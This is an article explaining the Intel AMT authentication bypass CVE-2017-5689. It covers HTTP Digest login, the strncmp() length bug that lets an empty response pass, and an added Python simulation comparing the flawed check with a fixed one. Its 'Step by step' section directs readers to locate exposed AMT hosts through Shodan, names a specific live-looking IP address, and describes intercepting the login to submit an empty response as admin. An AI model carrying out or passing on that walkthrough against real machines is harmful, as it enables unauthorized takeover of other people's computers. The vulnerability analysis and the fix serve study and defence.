Intel AMT Vulnerability Allows Remote Hack: Critical Escalation of Privilege Bug
The vulnerability, labeled CVE-2017-5689, affects Intel remote management technologies, including Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT) software, versions 6 through 11.6.
Where does the Intel AMT vulnerability reside?
To protect Intel AMT Web Interface from unauthorized users, the service makes use of HTTP Digest and Kerberos authentication.
The escalation of privilege vulnerability resides in the way Intel AMT Web Interface handles user authentication over HTTP Digest protocol, which is based on a simple challenge-response paradigm.
Before going into the technical details of exploiting this vulnerability, you first need to know how Digest authentication works.
The Digest authentication completes in the following steps:
- The client requests a protected page; the server answers with 401 Unauthorized and a WWW-Authenticate header carrying a realm and a randomly generated 'nonce'. The HTTP method and the requested URI of the client's own request also enter the calculation.
- Next, the user is prompted to enter a username and password.
- The client then sends a response value (referred to as user_response) to the server: an MD5 hash computed over the username, realm and password together with the server-supplied nonce, the HTTP method and the requested URI. It is a hash, not an encrypted string, so the server cannot reverse it; it can only recompute it.
- The server computes the same value (referred to as computed_response) from the username and password it has stored and the same nonce, method and URI.
- The server compares the two strings with the strncmp() function and, if they match, lets the user log into the Intel AMT Web Interface.
Syntax example: strncmp() compares two C strings and returns a negative, zero, or positive integer depending on whether string_1 sorts before, equal to, or after string_2. It stops at the first differing byte, at a NUL terminator, or after length bytes, whichever comes first, so it is not binary safe, and with a length of 0 it compares nothing and returns zero.
strncmp (string_1, string_2, length)
where the length parameter defines the maximum number of characters to compare.
Obviously, for successful authentication user_response must equal computed_response, so strncmp() must return zero; but strncmp() only proves equality if the length parameter covers the full length of the digest.
But, according to the researcher, the programmers who coded this authentication process for the Intel platform mistakenly passed the length of the user_response variable to strncmp() as the length parameter, instead of the length of computed_response. user_response comes from the client, so an attacker who sends an empty response string makes that length 0; strncmp() then compares nothing, returns zero, and the server treats the login as valid without the attacker ever knowing the password.
Step by step:
1. Go to Shodan and search for "Active Management Technologies".
2. Open the first result: http://187.213.218.159:16992/logon.htm
3. Go to the login page, submit an empty login, and intercept the request with an intercepting proxy.
4. In the intercepted Authorization header, set the username to admin and set the response value to an empty string (response="").
5. Forward the request: access is granted.
POC Video : https://goo.gl/V4zs2N
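The Digest exchange described above and the empty-response trick from step 4, modelled end to end as an added example. This is not code from the page and not Intel's firmware (which is C); the realm, account, password, URI and nonce are constructed for the demonstration, and c_strncmp() reproduces C strncmp() semantics in Python so the length-0 behaviour can be shown next to a fixed comparison.

```python
# Added example: CVE-2017-5689 Digest check, vulnerable strncmp() vs. a fixed compare.
# All values below are constructed for the demo; nothing here is Intel's own code.
import hashlib
import hmac
import re
import secrets

REALM = "Digest:0123456789ABCDEF"   # constructed realm, AMT-style
USERNAME = "admin"
PASSWORD = "P@ssw0rd!"              # the password the server has on file
METHOD = "GET"
URI = "/logon.htm"


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, password, realm, nonce, method, uri):
    """RFC 2617 Digest response without qop: MD5(HA1:nonce:HA2)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def server_challenge():
    """Step 1: the server answers 401 with a realm and a fresh nonce."""
    nonce = secrets.token_hex(16)
    return nonce, f'WWW-Authenticate: Digest realm="{REALM}", nonce="{nonce}"'


def client_authorization(nonce, username, password, response=None,
                         uri=URI, method=METHOD):
    """Steps 2-3: the client hashes its credentials into the response value.
    Passing response= overrides the hash, which is what an intercepting proxy
    lets the attacker do in step 4 of the walkthrough."""
    if response is None:
        response = digest_response(username, password, REALM, nonce, method, uri)
    return (f'Digest username="{username}", realm="{REALM}", nonce="{nonce}", '
            f'uri="{uri}", response="{response}"')


_PARAM_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_authorization(header):
    """Parse the quoted key="value" pairs of a Digest Authorization header."""
    scheme, _, params = header.partition(" ")
    if scheme != "Digest":
        raise ValueError("not a Digest Authorization header")
    return dict(_PARAM_RE.findall(params))


def c_strncmp(a: bytes, b: bytes, n: int) -> int:
    """C strncmp() semantics: compare at most n bytes, stopping at a NUL or the
    first difference; n == 0 compares nothing and returns 0."""
    for i in range(n):
        ca = a[i] if i < len(a) else 0
        cb = b[i] if i < len(b) else 0
        if ca != cb:
            return -1 if ca < cb else 1
        if ca == 0:
            break
    return 0


def _computed_response(params, nonce, method):
    """Step 4: the server recomputes the digest from its stored password."""
    if params.get("username") != USERNAME:
        return None
    return digest_response(USERNAME, PASSWORD, REALM, nonce, method, params.get("uri", ""))


def vulnerable_check(header, nonce, method=METHOD):
    """Step 5 as shipped: the length comes from the attacker-controlled user_response."""
    params = parse_authorization(header)
    computed = _computed_response(params, nonce, method)
    if computed is None:
        return False
    user_response = params.get("response", "")
    return c_strncmp(user_response.encode(), computed.encode(), len(user_response)) == 0


def fixed_check(header, nonce, method=METHOD):
    """Step 5 done right: require the full digest length, then compare in constant time."""
    params = parse_authorization(header)
    computed = _computed_response(params, nonce, method)
    if computed is None:
        return False
    user_response = params.get("response", "")
    if len(user_response) != len(computed):
        return False
    return hmac.compare_digest(user_response.encode(), computed.encode())


def demo():
    """Send a correct, a wrong-password and an empty-response login to both checks."""
    nonce, _challenge = server_challenge()
    good = client_authorization(nonce, USERNAME, PASSWORD)
    wrong = client_authorization(nonce, USERNAME, "wrong-password")
    empty = client_authorization(nonce, USERNAME, "", response="")  # step 4 of the walkthrough
    return {
        "good": (vulnerable_check(good, nonce), fixed_check(good, nonce)),
        "wrong": (vulnerable_check(wrong, nonce), fixed_check(wrong, nonce)),
        "empty": (vulnerable_check(empty, nonce), fixed_check(empty, nonce)),
    }


if __name__ == "__main__":
    for name, (vuln, fixed) in demo().items():
        print(f"{name:6} vulnerable={vuln!s:5} fixed={fixed}")
```

Running demo() shows the vulnerable check accepting the empty response while rejecting the wrong password: with response="" the length passed to strncmp() is 0, so nothing is compared and it returns zero. The same code also accepts a one-character response one time in sixteen, because the attacker controls how many bytes are compared, so the defect is a prefix-length oracle rather than only an empty-string case. The fixed check pins the comparison length to the server-computed digest and uses hmac.compare_digest() so the comparison does not leak timing either.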